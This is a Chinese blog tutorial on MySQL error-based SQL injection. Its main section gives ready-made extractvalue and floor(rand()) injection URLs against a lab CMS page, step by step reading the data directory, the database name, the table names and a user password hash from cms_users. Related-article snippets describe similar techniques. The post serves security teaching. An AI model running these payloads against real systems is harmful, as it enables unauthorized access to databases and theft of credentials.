[SQL注入] 报错注入

最新推荐文章于 2024-10-03 01:54:42 发布
最新推荐文章于 2024-10-03 01:54:42 发布
阅读量1.7k 收藏 2
点赞数 1
分类专栏: SQL注入 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43586169/article/details/124627115
版权

1、报错注入原理

主要是通过在输入框中,用有限的可控参数,构造指定的错误,让其在前端页面显示报错信息,可以获取到最终的信息

当我们使用SQL注入的时候,如果使用and 1=1没有回显信息,然后输入错误的信息,有报错的时候,可以使用报错注入

在注入点的判断过程中,发现数据库中SQL 语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。

2、查询出数据库的路径

 http://192.168.79.147/cms/show.php
 ?id=-33 and (select 1 from (select count(*),concat(0x5e,(select @@datadir),0x5e,floor(rand()*2))x from information_schema.tables group by x)a)

3、查询出当前网页使用的数据库名称

 http://192.168.79.147/cms/show.php
 ?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e))

 

 

4、查询出数据库的所有表名

 http://192.168.79.147/cms/show.php
 ?id=33 and extractvalue(1,concat(0x5e,(select table_name from information_schema.tables where table_schema='cms' limit 7,1),0x5e))
 ​
 #limit 查询从第七个开始,查询一个

 

5、查询出数据库的表的密码

每次查询一列,只能查询指定的长度的字符

 http://192.168.79.147/cms/show.php
 ?id=33 and extractvalue(1,concat(0x5e,(select substr(password,17,32) from cms_users limit 0,1),0x5e))

 

e10adc3949ba59abbe56e057f20f883e

红蓝安全
关注
专栏目录
SQL注入报错注入
m0_56578216的博客
08-23 1213
table_name=0x636d735f7573657273是cms_users表名转16进制后的结果,如果直接用表名’cms_users’,会导致表名被cms**转义并报错,**所以需要避免单引号的使用。在注入点的判断过程中,发现数据库SQL 语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。limit 0,1:用来限定取第0行的一行记录,由于有8个表,也就是有8行数据,多取会报错。limit 1,1:用来限定取第1行的一行记录,由于有3行数据,多取会报错。
SQL注入系列篇 | 报错注入
d59hao的博客
05-05 977
报错注入是通过构造恶意SQL,使数据库报错,从报错信息中得到敏感信息的方法。如果服务器应用没有对这种错误进行处理,则攻击者可以通过页面的错误回显获取数据。
关于SQL报错注入原理详细解析
qq_45672254的博客
11-17 738
关于SQL报错注入原理详细解析 之前读过多篇关于Mysql报错注入之floor(rand(0)*2)报错原理探究的文章,都觉得原理阐述大同小异,但在具体细节上,还是不太明白,结合看过的文章和自己的理解,对SQL报错注入原理进行更细致的分析,身为一名网络安全小白,也是想和刚入门的同学一起研究sql注入原理,文章如果有错误的地方,希望大佬批评指正。有兴趣的同学可以查看此篇文章的链接,了解sql报错注入的一般原理:Mysql报错注入之floor(rand(0)*2)报错原理探究 在报错原理分析中,主要困惑我的地方
sql报错注入原理
m0_54525483的博客
07-22 1719
0x00:前言 关于sql注入,经久不衰,现在的网站一般对sql注入的防护也相对加强了,2016年的渗透测试报告中,出现最多的是xss(跨站脚本攻击)和明文传输等,但是对sql注入的利用方式,也相对成熟,详细了解sql注入,可以参考之前的文章。http://wt7315.blog.51cto.com/10319657/1828167 今天主要分享下sql注入中的报错型,在大多网上的文章会列出类似于公式的句子,却没解释为什么要使用这样的函数,为什么使用这个函数会出现报错而导致sql注入。 ...
SQL注入报错注入方法汇总
最新发布
wanggonghanfei的博客
10-03 1859
响应过程:用户在前台页面输入检索内容后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面0.2 类型。
sql注入报错注入原理解析
热门推荐
一个安全研究员
05-25 1万+
sql注入报错注入原理详解 前言 我相信很多小伙伴在玩sql注入报错注入时都会有一个疑问,为什么这么写就会报错?曾经我去查询的时候,也没有找到满意的答案,时隔几个月终于找到搞清楚原理,特此记录,也希望后来的小伙伴能够少走弯路 0x01 我们先来看一看现象,我这里有一个users表,里面有五条数据: 然后用我们的报错语句查询一下: select count(*...
sql注入报错注入
m0_63436163的博客
08-27 1212
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。
SQL报错注入原理与实战利用讲解
chen_zhangkonzhe的博客
09-13 1573
MySQL有很多函数支持报错:updatexml() ,floor(), extractvalue() linestring() multipolygon() poolygon() multion()等。但是虽然采用了updatexml报错函数但是该函数只能显示32长度的内容,如果获取的内长度超过32则不会显示,然而这时候就需要使用字符串截取方法了,每次能够获取32个字符串的长度。首先需要获取当前数据库,通过数据库获取表名,接着通过表名获取字段,最后获取字段的数据内容。获取到表名就可以接着获取字段了。
SQL注入报错注入
qq_45557130的博客
10-07 593
sql注入报错注入
SQL注入 报错(updatexml与extractvalue函数介绍)-01
09-15
SQL注入报错(updatexml与extractvalue函数介绍) SQL注入是一种常见的Web应用安全漏洞,它是指攻击者通过在Web应用的输入中inject恶意的SQL代码,来获取或修改数据库中的数据。今天,我们将讨论SQL注入报错的两种...
sql注入报错注入使用场景
06-19
SQL注入是一种常见的Web安全漏洞,攻击者通过构造恶意的SQL查询语句,利用应用程序没有正确验证或转义用户输入的机会,将这些查询插入到应用程序的数据库查询中。这种攻击可能导致未经授权的数据访问、数据修改甚至...
SQL报错注入
weixin_59872639的博客
02-18 987
SQL报错注入概述 通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通 过页面面的错误提示回显出来。 报错注入的前提条件 Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上 后台未对一些具有报错功能的函数(如extractvalue、updatexml等)进行过滤 Xpath类型函数 extractvalue() 作用:对XML文档进行查询,相当于在HTML文件中用标签查找元素。 语法: extractvalue( XML_
SQL注入-报错注入
m0_53820621的博客
08-15 1022
SQL注入-报错注入
sql报错注入
球球的博客
02-18 906
sql报错注入,floor报错注入,extractvalue报错注入,updatexml报错注入
sql 报错注入
weixin_49298265的博客
12-22 222
sql报错注入报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 xpath语法错误(局限性) extractvalue负责在xml文档中按照xpath语法查询节点内容,updatexml则负责修改查询到的内容: updatexml 函数原型:updatexml(xml_document,xpath_string,new_value) 正常语法:updatexml(xml_document,xpath_string,new_value) 第一个参数
SQL注入报错注入攻击解析
SQL注入攻击简介 ## 1.1 什么是SQL注入攻击 SQL注入攻击是指黑客利用程序缺陷,向Web表单提交恶意的SQL查询代码,以欺骗服务器执行恶意的SQL查询,从而非法获取数据或篡改数据。黑客通过SQL注入攻击可以绕过应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

红蓝安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值